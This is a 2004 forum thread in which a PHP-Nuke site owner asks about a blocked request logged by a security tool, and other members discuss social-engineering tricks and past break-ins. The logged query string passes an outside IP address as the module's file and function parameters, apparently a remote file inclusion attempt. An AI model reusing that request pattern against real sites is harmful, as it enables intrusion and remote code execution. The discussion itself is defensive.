Welcome to WebmasterWorld Guest from 126.96.36.199
Forum Moderators: phranque
I've been receiving several notifications like the following ... with [217.XX.104.226...] in the url ... and just am curious if anyone knows what they are attempting to do?
Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/188.8.131.52
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
Who-Is for IP
OrgName: Unknown Works
Address: 3928 SE Tolman st
NetRange: 63.2XX.164.144 - 63.2XX.164.151
TechName: Internet Operations, XXYY
[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]
Let's just say it's been years since I got caught out with techniques like that and it definately "woke me up"
The URL that was in the original post led my browser to open multiple non stop self replicating popups with huge binary sound files.
It's a play on the old trick of doing the same but with telnet windows to consume CPU resource leading to a crash. If my memory serves me correctly it was part of the first .hta virii generator called God Message (or something similar)
Anyway...... as to the cause of why you are getting these messages. Where are you receiving them from?
A software firewall like Zone Alarm etc or in your server logs?
Thanks for letting me know.
I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago and then I put in some major security features ... one of which is called "Sentinel" and that is the program that is sending me the alerts letting me know that someone was banned on my site.
Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of sql injection method or a play on the url trying to add an admin account or something. And now Sentinel is beefed up to even ban Agents or "web site grabbers".
But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.
Seems kind of weird that they would be doing that to themselves ;o)
Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.
Just by posting the URL to your server you are getting the alerts. If they realise this then in all honesty you (and I) are going to check it out leading to the desired result.
Or.... if newbiehangout is your site they could well be using it to mask attempts on others as it appears from that the format of the URL that it is proxying the request.
Good old fashioned social engineering technique.
Yep, that's my url .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL
My site was fine until I developed a couple modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But, there hasn't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.
It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...
It's like they wait for someone else to post a code and then they just copy and paste it to see if it works ;o)
Awww, well ... live and learn.
You've been a pleasure to talk to and I appreciate your help.